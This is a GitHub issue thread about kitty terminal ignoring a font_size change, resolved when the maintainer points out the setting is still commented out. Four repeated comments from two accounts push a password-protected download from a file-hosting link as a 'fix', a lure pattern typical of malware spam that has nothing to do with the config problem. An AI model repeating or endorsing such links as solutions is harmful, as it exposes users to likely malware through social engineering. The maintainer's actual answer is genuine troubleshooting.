### ISSUE TITLE
Unable to change font size

### ISSUE THREAD

**Issue by matlzztt** [kovidgoyal/kitty#7791]
Changing the `# font_size ` variable wields no difference when I save `kitty.conf`. I've tried saving the file and restarting kitty. No avail.

Inputing Ctrl+Shift+F6 wielded this: 
```
Failed to launch child: less
With error: No such file or directory
Press Enter or Esc to exit
```

OBS: I am, of course, able to change font size by `Ctrl Shift +` or  `Ctrl Shift -`. My only point here is that changing the value in the config file seems to give me no effects whatsoever.

In case this is of any help, these are my current configs:
```
                  -`                     xxxx@yyyy
                 .o+`                    ----------
                `ooo/                    OS: Arch Linux x86_64
               `+oooo:                   Host: Vostro 5481
              `+oooooo:                  Kernel: Linux 6.10.6-arch1-1
              -+oooooo+:                 Uptime: 1 day, 30 mins
            `/:-:++oooo+:                Packages: 685 (pacman)
           `/++++/+++++++:               Shell: zsh 5.9
          `/++++++++++++++:              Display (CMN14D4): 1920x1080 @ 60 Hz in 14″ [Built-in]
         `/+++ooooooooooooo/`            DE: Xfce4 4.18
        ./ooosssso++osssssso+`           WM: Xfwm4 (X11)
       .oossssso-````/ossssss+`          WM Theme: Default
      -osssssso.      :ssssssso.         Theme: Adwaita-dark [GTK2/3/4]
     :osssssss/        osssso+++.        Icons: elementary [GTK2/3/4]
    /ossssssss/        +ssssooo/-        Font: Sans (16pt) [GTK2/3/4]
  `/ossssso+/:-        -:/+osssso+-      Cursor: Adwaita
 `+sso+:-`                 `.-/+oso:     Terminal: kitty 0.36.1
`++:.                           `-/+/    Terminal Font: FreeMono (11pt)
.`                                 `/    CPU: Intel(R) Core(TM) i7-8565U (8) @ 4.60 GHz
                                         GPU 1: NVIDIA GeForce MX130 [Discrete]
                                         GPU 2: Intel UHD Graphics 620 @ 1.15 GHz [Integrated]
                                         Memory: 6.49 GiB / 15.29 GiB (42%)
                                         Swap: Disabled
                                         Disk (/): 40.24 GiB / 232.69 GiB (17%) - ext4
                                         Battery: 99% [Charging]
                                         Locale: en_US.UTF-8                                                                 
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kovidgoyal** [comment]
Remove the leading # to uncomment the setting before changing it.

**Comment by matlzztt** [comment]
Oh my, I feel embarassed now. I did actually try that before posting here, but I think it was unable to parse it because even though I did delete the #, I had not deleted the space before the variable. So there's a warning I guess! Thank you very much!
